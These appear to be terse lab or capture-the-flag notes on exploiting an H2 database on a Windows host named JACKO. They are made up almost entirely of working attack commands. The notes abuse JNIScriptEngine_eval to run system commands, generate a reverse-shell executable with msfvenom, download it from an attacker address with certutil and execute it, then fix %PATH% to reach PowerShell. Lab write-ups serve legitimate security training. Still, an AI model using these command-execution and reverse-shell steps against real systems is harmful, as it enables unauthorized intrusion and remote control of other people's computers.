4 H2 JNIScriptEngine exploit > tony

# run shell
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c C:\\Users\\Tony\\Documents\\kashz.exe").getInputStream()).useDelimiter("\\Z").next()');

CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("systeminfo").getInputStream()).useDelimiter("\\Z").next()');

Host Name:                 JACKO
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.18363 N/A Build 18363
Registered Owner:          tony
System Type:               x64-based PC
Hotfix(s):                 9 Hotfix(s) Installed. 

# shell
# use a port that is open (reachable from the target)
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.105 LPORT=8082 -f exe -o kashz.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: kashz.exe

# download shell
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil.exe -urlcache -f http://192.168.49.105/kashz.exe C:\\Users\\Tony\\Documents\\kashz.exe").getInputStream()).useDelimiter("\\Z").next()');


# call shell
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c C:\\Users\\Tony\\Documents\\kashz.exe").getInputStream()).useDelimiter("\\Z").next()');

# can't find powershell or anything else on %PATH%
echo %path%
C:\Users\tony\AppData\Local\Microsoft\WindowsApps

# update %PATH%
# cmd
set PATH=%PATH%;C:\Windows\System32\;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\wbem\;
# powershell
$env:Path += ";C:\Windows\System32\;C:\Windows\System32\WindowsPowerShell\v1.0\"
